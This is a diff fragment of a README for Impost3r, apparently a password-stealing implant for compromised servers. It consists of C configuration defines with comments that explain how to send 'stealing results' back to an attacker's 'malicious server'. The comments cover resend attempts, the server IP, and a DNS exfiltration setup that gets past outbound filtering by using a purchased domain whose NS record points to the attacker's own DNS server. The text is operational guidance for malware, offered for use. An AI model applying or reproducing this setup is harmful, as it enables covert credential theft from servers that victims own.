ph4ntonn/Impost3r/README_EN.md

 /*
     Send to server
 */
+# define YOUR_DOMAIN ".com" \\Note that if you don’t want to buy a domain name to receive messages sent back by Impost3r and the target server implanted in Impost3r does not prohibit direct udp connections to port 53 of the dns server you control, then please use the default value for the domain name here
+\\But if the target server implanted in Impost3r strictly restricts the outbound dns request, please change the value of YOUR_DOMAIN to the domain name you purchased, such as ".example.com", and meanwhile configure the NS record of this domain name to be the DNS server address you control, run Fdns on this DNS server.Change the value of REMOTE_ADDRESS below to the default dns address of the target server implanted in Impost3r(like 192.168.0.1), also change REMOTE_PORT to the default dns service's listening port(port 53 in most cases).
 # define MAX_RESEND 30 \\Set the maximum times that Impost3r will try to resends stealing result to attacker's server
 # define RESEND_INTERVAL 5 \\Set the interval of resending stealing result.
 # define REMOTE_ADDRESS "192.168.0.12" \\Set the malicious server ip address that you want to receive stealing result